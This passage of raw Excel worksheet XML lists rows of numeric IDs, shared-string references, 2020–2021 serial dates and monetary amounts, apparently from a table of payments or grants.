      <c r="C1972" t="s">
        <v>5230</v>
      </c>
      <c r="D1972" t="s">
        <v>10169</v>
      </c>
      <c r="E1972">
        <v>12</v>
      </c>
      <c r="F1972" t="s">
        <v>10130</v>
      </c>
      <c r="G1972" s="1">
        <v>44099</v>
      </c>
      <c r="H1972">
        <v>50000</v>
      </c>
      <c r="J1972" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="1973" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1973">
        <v>21488</v>
      </c>
      <c r="B1973">
        <v>2577</v>
      </c>
      <c r="C1973" t="s">
        <v>5230</v>
      </c>
      <c r="D1973" t="s">
        <v>10169</v>
      </c>
      <c r="E1973">
        <v>12</v>
      </c>
      <c r="F1973" t="s">
        <v>9681</v>
      </c>
      <c r="G1973" s="1">
        <v>44099</v>
      </c>
      <c r="H1973">
        <v>25000</v>
      </c>
      <c r="I1973" t="s">
        <v>11426</v>
      </c>
      <c r="J1973" t="s">
        <v>11427</v>
      </c>
    </row>
    <row r="1974" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1974">
        <v>21489</v>
      </c>
      <c r="B1974">
        <v>2577</v>
      </c>
      <c r="C1974" t="s">
        <v>5230</v>
      </c>
      <c r="D1974" t="s">
        <v>10169</v>
      </c>
      <c r="E1974">
        <v>12</v>
      </c>
      <c r="F1974" t="s">
        <v>609</v>
      </c>
      <c r="G1974" s="1">
        <v>44099</v>
      </c>
      <c r="H1974">
        <v>75000</v>
      </c>
      <c r="J1974" t="s">
        <v>11428</v>
      </c>
    </row>
    <row r="1975" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1975">
        <v>21490</v>
      </c>
      <c r="B1975">
        <v>2577</v>
      </c>
      <c r="C1975" t="s">
        <v>5230</v>
      </c>
      <c r="D1975" t="s">
        <v>10169</v>
      </c>
      <c r="E1975">
        <v>12</v>
      </c>
      <c r="F1975" t="s">
        <v>9722</v>
      </c>
      <c r="G1975" s="1">
        <v>44099</v>
      </c>
      <c r="H1975">
        <v>75000</v>
      </c>
      <c r="J1975" t="s">
        <v>11422</v>
      </c>
    </row>
    <row r="1976" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1976">
        <v>21491</v>
      </c>
      <c r="B1976">
        <v>2577</v>
      </c>
      <c r="C1976" t="s">
        <v>5230</v>
      </c>
      <c r="D1976" t="s">
        <v>10169</v>
      </c>
      <c r="E1976">
        <v>12</v>
      </c>
      <c r="F1976" t="s">
        <v>11429</v>
      </c>
      <c r="G1976" s="1">
        <v>44099</v>
      </c>
      <c r="H1976">
        <v>25000</v>
      </c>
      <c r="J1976" t="s">
        <v>11430</v>
      </c>
    </row>
    <row r="1977" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1977">
        <v>21492</v>
      </c>
      <c r="B1977">
        <v>2577</v>
      </c>
      <c r="C1977" t="s">
        <v>5230</v>
      </c>
      <c r="D1977" t="s">
        <v>10169</v>
      </c>
      <c r="E1977">
        <v>12</v>
      </c>
      <c r="F1977" t="s">
        <v>4686</v>
      </c>
      <c r="G1977" s="1">
        <v>44099</v>
      </c>
      <c r="H1977">
        <v>25000</v>
      </c>
      <c r="J1977" t="s">
        <v>11431</v>
      </c>
    </row>
    <row r="1978" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1978">
        <v>21493</v>
      </c>
      <c r="B1978">
        <v>2577</v>
      </c>
      <c r="C1978" t="s">
        <v>5230</v>
      </c>
      <c r="D1978" t="s">
        <v>10169</v>
      </c>
      <c r="E1978">
        <v>12</v>
      </c>
      <c r="F1978" t="s">
        <v>9577</v>
      </c>
      <c r="G1978" s="1">
        <v>44099</v>
      </c>
      <c r="H1978">
        <v>48000</v>
      </c>
      <c r="J1978" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="1979" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1979">
        <v>21494</v>
      </c>
      <c r="B1979">
        <v>2577</v>
      </c>
      <c r="C1979" t="s">
        <v>5230</v>
      </c>
      <c r="D1979" t="s">
        <v>10169</v>
      </c>
      <c r="E1979">
        <v>12</v>
      </c>
      <c r="F1979" t="s">
        <v>11432</v>
      </c>
      <c r="G1979" s="1">
        <v>44099</v>
      </c>
      <c r="H1979">
        <v>25000</v>
      </c>
      <c r="I1979" t="s">
        <v>11426</v>
      </c>
      <c r="J1979" t="s">
        <v>11422</v>
      </c>
    </row>
    <row r="1980" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1980">
        <v>21495</v>
      </c>
      <c r="B1980">
        <v>2577</v>
      </c>
      <c r="C1980" t="s">
        <v>5230</v>
      </c>
      <c r="D1980" t="s">
        <v>10169</v>
      </c>
      <c r="E1980">
        <v>12</v>
      </c>
      <c r="F1980" t="s">
        <v>11433</v>
      </c>
      <c r="G1980" s="1">
        <v>44099</v>
      </c>
      <c r="H1980">
        <v>15000</v>
      </c>
      <c r="J1980" t="s">
        <v>9909</v>
      </c>
    </row>
    <row r="1981" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1981">
        <v>21496</v>
      </c>
      <c r="B1981">
        <v>2577</v>
      </c>
      <c r="C1981" t="s">
        <v>5230</v>
      </c>
      <c r="D1981" t="s">
        <v>10169</v>
      </c>
      <c r="E1981">
        <v>12</v>
      </c>
      <c r="F1981" t="s">
        <v>11434</v>
      </c>
      <c r="G1981" s="1">
        <v>44099</v>
      </c>
      <c r="H1981">
        <v>200000</v>
      </c>
      <c r="J1981" t="s">
        <v>11435</v>
      </c>
    </row>
    <row r="1982" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1982">
        <v>21497</v>
      </c>
      <c r="B1982">
        <v>777</v>
      </c>
      <c r="C1982" t="s">
        <v>1671</v>
      </c>
      <c r="D1982" t="s">
        <v>11436</v>
      </c>
      <c r="E1982">
        <v>22</v>
      </c>
      <c r="F1982" t="s">
        <v>1674</v>
      </c>
      <c r="G1982" s="1">
        <v>44050</v>
      </c>
      <c r="H1982">
        <v>104720</v>
      </c>
      <c r="J1982" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="1983" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1983">
        <v>21498</v>
      </c>
      <c r="B1983">
        <v>732</v>
      </c>
      <c r="C1983" t="s">
        <v>1680</v>
      </c>
      <c r="D1983" t="s">
        <v>11437</v>
      </c>
      <c r="E1983">
        <v>2</v>
      </c>
      <c r="F1983" t="s">
        <v>9640</v>
      </c>
      <c r="G1983" s="1">
        <v>44085</v>
      </c>
      <c r="H1983">
        <v>10000</v>
      </c>
      <c r="J1983" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1984" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1984">
        <v>21499</v>
      </c>
      <c r="B1984">
        <v>732</v>
      </c>
      <c r="C1984" t="s">
        <v>1680</v>
      </c>
      <c r="D1984" t="s">
        <v>11437</v>
      </c>
      <c r="E1984">
        <v>2</v>
      </c>
      <c r="F1984" t="s">
        <v>9577</v>
      </c>
      <c r="G1984" s="1">
        <v>44085</v>
      </c>
      <c r="H1984">
        <v>50000</v>
      </c>
      <c r="J1984" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1985" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1985">
        <v>21500</v>
      </c>
      <c r="B1985">
        <v>732</v>
      </c>
      <c r="C1985" t="s">
        <v>1680</v>
      </c>
      <c r="D1985" t="s">
        <v>11437</v>
      </c>
      <c r="E1985">
        <v>2</v>
      </c>
      <c r="F1985" t="s">
        <v>9437</v>
      </c>
      <c r="G1985" s="1">
        <v>44085</v>
      </c>
      <c r="H1985">
        <v>15000</v>
      </c>
      <c r="J1985" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1986" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1986">
        <v>21505</v>
      </c>
      <c r="B1986">
        <v>826</v>
      </c>
      <c r="C1986" t="s">
        <v>1552</v>
      </c>
      <c r="D1986" t="s">
        <v>11438</v>
      </c>
      <c r="E1986">
        <v>14</v>
      </c>
      <c r="F1986" t="s">
        <v>7241</v>
      </c>
      <c r="G1986" s="1">
        <v>44098</v>
      </c>
      <c r="H1986">
        <v>20000</v>
      </c>
      <c r="I1986" t="s">
        <v>9536</v>
      </c>
      <c r="J1986" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1987" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1987">
        <v>21508</v>
      </c>
      <c r="B1987">
        <v>2715</v>
      </c>
      <c r="C1987" t="s">
        <v>6944</v>
      </c>
      <c r="D1987" t="s">
        <v>11323</v>
      </c>
      <c r="E1987">
        <v>18</v>
      </c>
      <c r="F1987" t="s">
        <v>8295</v>
      </c>
      <c r="G1987" s="1">
        <v>44116</v>
      </c>
      <c r="H1987">
        <v>100</v>
      </c>
      <c r="I1987" t="s">
        <v>11324</v>
      </c>
      <c r="J1987" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1988" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1988">
        <v>21509</v>
      </c>
      <c r="B1988">
        <v>4824</v>
      </c>
      <c r="C1988" t="s">
        <v>7201</v>
      </c>
      <c r="D1988" t="s">
        <v>11439</v>
      </c>
      <c r="E1988">
        <v>29</v>
      </c>
      <c r="F1988" t="s">
        <v>6917</v>
      </c>
      <c r="G1988" s="1">
        <v>44048</v>
      </c>
      <c r="H1988">
        <v>60000</v>
      </c>
      <c r="I1988" t="s">
        <v>11440</v>
      </c>
      <c r="J1988" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="1989" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1989">
        <v>21510</v>
      </c>
      <c r="B1989">
        <v>4824</v>
      </c>
      <c r="C1989" t="s">
        <v>7201</v>
      </c>
      <c r="D1989" t="s">
        <v>11439</v>
      </c>
      <c r="E1989">
        <v>29</v>
      </c>
      <c r="F1989" t="s">
        <v>11442</v>
      </c>
      <c r="G1989" s="1">
        <v>44048</v>
      </c>
      <c r="H1989">
        <v>60000</v>
      </c>
      <c r="I1989" t="s">
        <v>11440</v>
      </c>
      <c r="J1989" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="1990" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1990">
        <v>21511</v>
      </c>
      <c r="B1990">
        <v>4824</v>
      </c>
      <c r="C1990" t="s">
        <v>7201</v>
      </c>
      <c r="D1990" t="s">
        <v>11439</v>
      </c>
      <c r="E1990">
        <v>29</v>
      </c>
      <c r="F1990" t="s">
        <v>11443</v>
      </c>
      <c r="G1990" s="1">
        <v>44048</v>
      </c>
      <c r="H1990">
        <v>60000</v>
      </c>
      <c r="I1990" t="s">
        <v>11440</v>
      </c>
      <c r="J1990" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="1991" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1991">
        <v>21512</v>
      </c>
      <c r="B1991">
        <v>4824</v>
      </c>
      <c r="C1991" t="s">
        <v>7201</v>
      </c>
      <c r="D1991" t="s">
        <v>11439</v>
      </c>
      <c r="E1991">
        <v>29</v>
      </c>
      <c r="F1991" t="s">
        <v>4686</v>
      </c>
      <c r="G1991" s="1">
        <v>44048</v>
      </c>
      <c r="H1991">
        <v>60000</v>
      </c>
      <c r="I1991" t="s">
        <v>11440</v>
      </c>
      <c r="J1991" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="1992" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1992">
        <v>21515</v>
      </c>
      <c r="B1992">
        <v>374</v>
      </c>
      <c r="C1992" t="s">
        <v>1035</v>
      </c>
      <c r="D1992" t="s">
        <v>10908</v>
      </c>
      <c r="E1992">
        <v>16</v>
      </c>
      <c r="F1992" t="s">
        <v>9472</v>
      </c>
      <c r="G1992" s="1">
        <v>44070</v>
      </c>
      <c r="H1992">
        <v>200000</v>
      </c>
      <c r="I1992" t="s">
        <v>11444</v>
      </c>
      <c r="J1992" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="1993" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1993">
        <v>21516</v>
      </c>
      <c r="B1993">
        <v>606</v>
      </c>
      <c r="C1993" t="s">
        <v>16403</v>
      </c>
      <c r="D1993" t="s">
        <v>16404</v>
      </c>
      <c r="E1993">
        <v>11</v>
      </c>
      <c r="F1993" t="s">
        <v>11445</v>
      </c>
      <c r="G1993" s="1">
        <v>44071</v>
      </c>
      <c r="H1993" s="4">
        <v>1000000</v>
      </c>
      <c r="I1993" t="s">
        <v>11446</v>
      </c>
    </row>
    <row r="1994" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1994">
        <v>21517</v>
      </c>
      <c r="B1994">
        <v>2189</v>
      </c>
      <c r="C1994" t="s">
        <v>16405</v>
      </c>
      <c r="D1994" t="s">
        <v>16406</v>
      </c>
      <c r="E1994">
        <v>26</v>
      </c>
      <c r="F1994" t="s">
        <v>11447</v>
      </c>
      <c r="G1994" s="1">
        <v>44116</v>
      </c>
      <c r="H1994" s="4">
        <v>75021</v>
      </c>
      <c r="J1994" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="1995" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1995">
        <v>21518</v>
      </c>
      <c r="B1995">
        <v>2189</v>
      </c>
      <c r="C1995" t="s">
        <v>16405</v>
      </c>
      <c r="D1995" t="s">
        <v>16406</v>
      </c>
      <c r="E1995">
        <v>26</v>
      </c>
      <c r="F1995" t="s">
        <v>11448</v>
      </c>
      <c r="G1995" s="1">
        <v>44116</v>
      </c>
      <c r="H1995" s="4">
        <v>900000</v>
      </c>
      <c r="J1995" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="1996" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1996">
        <v>21519</v>
      </c>
      <c r="B1996">
        <v>2189</v>
      </c>
      <c r="C1996" t="s">
        <v>16405</v>
      </c>
      <c r="D1996" t="s">
        <v>16406</v>
      </c>
      <c r="E1996">
        <v>26</v>
      </c>
      <c r="F1996" t="s">
        <v>11027</v>
      </c>
      <c r="G1996" s="1">
        <v>44116</v>
      </c>
      <c r="H1996" s="4">
        <v>2100000</v>
      </c>
      <c r="J1996" t="s">
        <v>11449</v>
      </c>
    </row>
    <row r="1997" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1997">
        <v>21520</v>
      </c>
      <c r="B1997">
        <v>2189</v>
      </c>
      <c r="C1997" t="s">
        <v>16405</v>
      </c>
      <c r="D1997" t="s">
        <v>16406</v>
      </c>
      <c r="E1997">
        <v>26</v>
      </c>
      <c r="F1997" t="s">
        <v>11096</v>
      </c>
      <c r="G1997" s="1">
        <v>44116</v>
      </c>
      <c r="H1997" s="4">
        <v>900000</v>
      </c>
      <c r="J1997" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="1998" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1998">
        <v>21521</v>
      </c>
      <c r="B1998">
        <v>2189</v>
      </c>
      <c r="C1998" t="s">
        <v>16405</v>
      </c>
      <c r="D1998" t="s">
        <v>16406</v>
      </c>
      <c r="E1998">
        <v>26</v>
      </c>
      <c r="F1998" t="s">
        <v>9502</v>
      </c>
      <c r="G1998" s="1">
        <v>44116</v>
      </c>
      <c r="H1998" s="4">
        <v>900000</v>
      </c>
      <c r="J1998" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="1999" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1999">
        <v>21522</v>
      </c>
      <c r="B1999">
        <v>2189</v>
      </c>
      <c r="C1999" t="s">
        <v>16405</v>
      </c>
      <c r="D1999" t="s">
        <v>16406</v>
      </c>
      <c r="E1999">
        <v>26</v>
      </c>
      <c r="F1999" t="s">
        <v>9667</v>
      </c>
      <c r="G1999" s="1">
        <v>44116</v>
      </c>
      <c r="H1999" s="4">
        <v>900000</v>
      </c>
      <c r="J1999" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="2000" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2000">
        <v>21523</v>
      </c>
      <c r="B2000">
        <v>2189</v>
      </c>
      <c r="C2000" t="s">
        <v>16405</v>
      </c>
      <c r="D2000" t="s">
        <v>16406</v>
      </c>
      <c r="E2000">
        <v>26</v>
      </c>
      <c r="F2000" t="s">
        <v>2236</v>
      </c>
      <c r="G2000" s="1">
        <v>44116</v>
      </c>
      <c r="H2000" s="4">
        <v>300000</v>
      </c>
      <c r="J2000" t="s">
        <v>11450</v>
      </c>
    </row>
    <row r="2001" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2001">
        <v>21524</v>
      </c>
      <c r="B2001">
        <v>2189</v>
      </c>
      <c r="C2001" t="s">
        <v>16405</v>
      </c>
      <c r="D2001" t="s">
        <v>16406</v>
      </c>
      <c r="E2001">
        <v>26</v>
      </c>
      <c r="F2001" t="s">
        <v>4686</v>
      </c>
      <c r="G2001" s="1">
        <v>44116</v>
      </c>
      <c r="H2001" s="4">
        <v>300000</v>
      </c>
      <c r="J2001" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2002" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2002">
        <v>21525</v>
      </c>
      <c r="B2002">
        <v>2189</v>
      </c>
      <c r="C2002" t="s">
        <v>16405</v>
      </c>
      <c r="D2002" t="s">
        <v>16406</v>
      </c>
      <c r="E2002">
        <v>26</v>
      </c>
      <c r="F2002" t="s">
        <v>9497</v>
      </c>
      <c r="G2002" s="1">
        <v>44116</v>
      </c>
      <c r="H2002" s="4">
        <v>900000</v>
      </c>
      <c r="J2002" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="2003" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2003">
        <v>21526</v>
      </c>
      <c r="B2003">
        <v>2189</v>
      </c>
      <c r="C2003" t="s">
        <v>16405</v>
      </c>
      <c r="D2003" t="s">
        <v>16406</v>
      </c>
      <c r="E2003">
        <v>26</v>
      </c>
      <c r="F2003" t="s">
        <v>3499</v>
      </c>
      <c r="G2003" s="1">
        <v>44116</v>
      </c>
      <c r="H2003" s="4">
        <v>900000</v>
      </c>
      <c r="J2003" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="2004" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2004">
        <v>21527</v>
      </c>
      <c r="B2004">
        <v>824</v>
      </c>
      <c r="C2004" t="s">
        <v>1687</v>
      </c>
      <c r="D2004" t="s">
        <v>11451</v>
      </c>
      <c r="E2004">
        <v>32</v>
      </c>
      <c r="F2004" t="s">
        <v>11452</v>
      </c>
      <c r="G2004" s="1">
        <v>44124</v>
      </c>
      <c r="H2004">
        <v>100000</v>
      </c>
      <c r="I2004" t="s">
        <v>9693</v>
      </c>
      <c r="J2004" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2005" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2005">
        <v>21528</v>
      </c>
      <c r="B2005">
        <v>824</v>
      </c>
      <c r="C2005" t="s">
        <v>1687</v>
      </c>
      <c r="D2005" t="s">
        <v>11451</v>
      </c>
      <c r="E2005">
        <v>32</v>
      </c>
      <c r="F2005" t="s">
        <v>1746</v>
      </c>
      <c r="G2005" s="1">
        <v>44124</v>
      </c>
      <c r="H2005">
        <v>50000</v>
      </c>
      <c r="I2005" t="s">
        <v>10642</v>
      </c>
      <c r="J2005" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="2006" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2006">
        <v>21529</v>
      </c>
      <c r="B2006">
        <v>824</v>
      </c>
      <c r="C2006" t="s">
        <v>1687</v>
      </c>
      <c r="D2006" t="s">
        <v>11451</v>
      </c>
      <c r="E2006">
        <v>32</v>
      </c>
      <c r="F2006" t="s">
        <v>11453</v>
      </c>
      <c r="G2006" s="1">
        <v>44124</v>
      </c>
      <c r="H2006">
        <v>100000</v>
      </c>
      <c r="I2006" t="s">
        <v>9693</v>
      </c>
      <c r="J2006" t="s">
        <v>11454</v>
      </c>
    </row>
    <row r="2007" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2007">
        <v>21530</v>
      </c>
      <c r="B2007">
        <v>824</v>
      </c>
      <c r="C2007" t="s">
        <v>1687</v>
      </c>
      <c r="D2007" t="s">
        <v>11451</v>
      </c>
      <c r="E2007">
        <v>32</v>
      </c>
      <c r="F2007" t="s">
        <v>2236</v>
      </c>
      <c r="G2007" s="1">
        <v>44124</v>
      </c>
      <c r="H2007">
        <v>20000</v>
      </c>
      <c r="I2007" t="s">
        <v>9693</v>
      </c>
      <c r="J2007" t="s">
        <v>11455</v>
      </c>
    </row>
    <row r="2008" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2008">
        <v>21531</v>
      </c>
      <c r="B2008">
        <v>4789</v>
      </c>
      <c r="C2008" t="s">
        <v>7222</v>
      </c>
      <c r="D2008" t="s">
        <v>11456</v>
      </c>
      <c r="E2008">
        <v>34</v>
      </c>
      <c r="F2008" t="s">
        <v>764</v>
      </c>
      <c r="G2008" s="1">
        <v>44070</v>
      </c>
      <c r="H2008">
        <v>10000</v>
      </c>
      <c r="J2008" t="s">
        <v>11457</v>
      </c>
    </row>
    <row r="2009" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2009">
        <v>21532</v>
      </c>
      <c r="B2009">
        <v>892</v>
      </c>
      <c r="C2009" t="s">
        <v>3297</v>
      </c>
      <c r="D2009" t="s">
        <v>11458</v>
      </c>
      <c r="E2009">
        <v>14</v>
      </c>
      <c r="F2009" t="s">
        <v>11459</v>
      </c>
      <c r="G2009" s="1">
        <v>44053</v>
      </c>
      <c r="H2009">
        <v>200000</v>
      </c>
      <c r="I2009" t="s">
        <v>11460</v>
      </c>
      <c r="J2009" t="s">
        <v>11461</v>
      </c>
    </row>
    <row r="2010" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2010">
        <v>21533</v>
      </c>
      <c r="B2010">
        <v>892</v>
      </c>
      <c r="C2010" t="s">
        <v>3297</v>
      </c>
      <c r="D2010" t="s">
        <v>11458</v>
      </c>
      <c r="E2010">
        <v>14</v>
      </c>
      <c r="F2010" t="s">
        <v>11462</v>
      </c>
      <c r="G2010" s="1">
        <v>44053</v>
      </c>
      <c r="H2010">
        <v>200000</v>
      </c>
      <c r="I2010" t="s">
        <v>11460</v>
      </c>
      <c r="J2010" t="s">
        <v>11461</v>
      </c>
    </row>
    <row r="2011" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2011">
        <v>21534</v>
      </c>
      <c r="B2011">
        <v>892</v>
      </c>
      <c r="C2011" t="s">
        <v>3297</v>
      </c>
      <c r="D2011" t="s">
        <v>11458</v>
      </c>
      <c r="E2011">
        <v>14</v>
      </c>
      <c r="F2011" t="s">
        <v>9437</v>
      </c>
      <c r="G2011" s="1">
        <v>44055</v>
      </c>
      <c r="H2011">
        <v>200000</v>
      </c>
      <c r="I2011" t="s">
        <v>11460</v>
      </c>
      <c r="J2011" t="s">
        <v>11461</v>
      </c>
    </row>
    <row r="2012" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2012">
        <v>21536</v>
      </c>
      <c r="B2012">
        <v>2778</v>
      </c>
      <c r="C2012" t="s">
        <v>7235</v>
      </c>
      <c r="D2012" t="s">
        <v>11463</v>
      </c>
      <c r="E2012">
        <v>5</v>
      </c>
      <c r="F2012" t="s">
        <v>11464</v>
      </c>
      <c r="G2012" s="1">
        <v>44075</v>
      </c>
      <c r="H2012">
        <v>72000</v>
      </c>
      <c r="I2012" t="s">
        <v>9638</v>
      </c>
      <c r="J2012" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2013" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2013">
        <v>21537</v>
      </c>
      <c r="B2013">
        <v>2778</v>
      </c>
      <c r="C2013" t="s">
        <v>7235</v>
      </c>
      <c r="D2013" t="s">
        <v>11463</v>
      </c>
      <c r="E2013">
        <v>5</v>
      </c>
      <c r="F2013" t="s">
        <v>11465</v>
      </c>
      <c r="G2013" s="1">
        <v>44075</v>
      </c>
      <c r="H2013">
        <v>68000</v>
      </c>
      <c r="I2013" t="s">
        <v>9638</v>
      </c>
      <c r="J2013" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2014" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2014">
        <v>21538</v>
      </c>
      <c r="B2014">
        <v>2778</v>
      </c>
      <c r="C2014" t="s">
        <v>7235</v>
      </c>
      <c r="D2014" t="s">
        <v>11463</v>
      </c>
      <c r="E2014">
        <v>5</v>
      </c>
      <c r="F2014" t="s">
        <v>9641</v>
      </c>
      <c r="G2014" s="1">
        <v>44075</v>
      </c>
      <c r="H2014">
        <v>20000</v>
      </c>
      <c r="I2014" t="s">
        <v>9638</v>
      </c>
      <c r="J2014" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2015" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2015">
        <v>21539</v>
      </c>
      <c r="B2015">
        <v>2779</v>
      </c>
      <c r="C2015" t="s">
        <v>7256</v>
      </c>
      <c r="D2015" t="s">
        <v>11466</v>
      </c>
      <c r="E2015">
        <v>5</v>
      </c>
      <c r="F2015" t="s">
        <v>11467</v>
      </c>
      <c r="G2015" s="1">
        <v>44265</v>
      </c>
      <c r="H2015">
        <v>68000</v>
      </c>
      <c r="I2015" t="s">
        <v>9638</v>
      </c>
      <c r="J2015" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2016" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2016">
        <v>21540</v>
      </c>
      <c r="B2016">
        <v>2779</v>
      </c>
      <c r="C2016" t="s">
        <v>7256</v>
      </c>
      <c r="D2016" t="s">
        <v>11466</v>
      </c>
      <c r="E2016">
        <v>5</v>
      </c>
      <c r="F2016" t="s">
        <v>11468</v>
      </c>
      <c r="G2016" s="1">
        <v>44265</v>
      </c>
      <c r="H2016">
        <v>44000</v>
      </c>
      <c r="I2016" t="s">
        <v>9638</v>
      </c>
      <c r="J2016" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2017" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2017">
        <v>21541</v>
      </c>
      <c r="B2017">
        <v>2649</v>
      </c>
      <c r="C2017" t="s">
        <v>1035</v>
      </c>
      <c r="D2017" t="s">
        <v>10499</v>
      </c>
      <c r="E2017">
        <v>14</v>
      </c>
      <c r="F2017" t="s">
        <v>9472</v>
      </c>
      <c r="G2017" s="1">
        <v>44048</v>
      </c>
      <c r="H2017">
        <v>150000</v>
      </c>
      <c r="J2017" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="2018" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2018">
        <v>21542</v>
      </c>
      <c r="B2018">
        <v>295</v>
      </c>
      <c r="C2018" t="s">
        <v>1699</v>
      </c>
      <c r="D2018" t="s">
        <v>11469</v>
      </c>
      <c r="E2018">
        <v>12</v>
      </c>
      <c r="F2018" t="s">
        <v>11470</v>
      </c>
      <c r="G2018" s="1">
        <v>44106</v>
      </c>
      <c r="H2018">
        <v>300000</v>
      </c>
      <c r="I2018" t="s">
        <v>9550</v>
      </c>
      <c r="J2018" t="s">
        <v>11471</v>
      </c>
    </row>
    <row r="2019" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2019">
        <v>21543</v>
      </c>
      <c r="B2019">
        <v>295</v>
      </c>
      <c r="C2019" t="s">
        <v>1699</v>
      </c>
      <c r="D2019" t="s">
        <v>11469</v>
      </c>
      <c r="E2019">
        <v>12</v>
      </c>
      <c r="F2019" t="s">
        <v>9437</v>
      </c>
      <c r="G2019" s="1">
        <v>44106</v>
      </c>
      <c r="H2019">
        <v>100000</v>
      </c>
      <c r="I2019" t="s">
        <v>9550</v>
      </c>
      <c r="J2019" t="s">
        <v>11472</v>
      </c>
    </row>
    <row r="2020" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2020">
        <v>21544</v>
      </c>
      <c r="B2020">
        <v>295</v>
      </c>
      <c r="C2020" t="s">
        <v>1699</v>
      </c>
      <c r="D2020" t="s">
        <v>11469</v>
      </c>
      <c r="E2020">
        <v>12</v>
      </c>
      <c r="F2020" t="s">
        <v>609</v>
      </c>
      <c r="G2020" s="1">
        <v>44106</v>
      </c>
      <c r="H2020">
        <v>100000</v>
      </c>
      <c r="J2020" t="s">
        <v>11473</v>
      </c>
    </row>
    <row r="2021" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2021">
        <v>21545</v>
      </c>
      <c r="B2021">
        <v>295</v>
      </c>
      <c r="C2021" t="s">
        <v>1699</v>
      </c>
      <c r="D2021" t="s">
        <v>11469</v>
      </c>
      <c r="E2021">
        <v>12</v>
      </c>
      <c r="F2021" t="s">
        <v>2236</v>
      </c>
      <c r="G2021" s="1">
        <v>44106</v>
      </c>
      <c r="H2021">
        <v>200000</v>
      </c>
      <c r="I2021" t="s">
        <v>9550</v>
      </c>
      <c r="J2021" t="s">
        <v>11472</v>
      </c>
    </row>
    <row r="2022" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2022">
        <v>21546</v>
      </c>
      <c r="B2022">
        <v>295</v>
      </c>
      <c r="C2022" t="s">
        <v>1699</v>
      </c>
      <c r="D2022" t="s">
        <v>11469</v>
      </c>
      <c r="E2022">
        <v>12</v>
      </c>
      <c r="F2022" t="s">
        <v>11474</v>
      </c>
      <c r="G2022" s="1">
        <v>44106</v>
      </c>
      <c r="H2022">
        <v>500000</v>
      </c>
      <c r="J2022" t="s">
        <v>11475</v>
      </c>
    </row>
    <row r="2023" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2023">
        <v>21547</v>
      </c>
      <c r="B2023">
        <v>2738</v>
      </c>
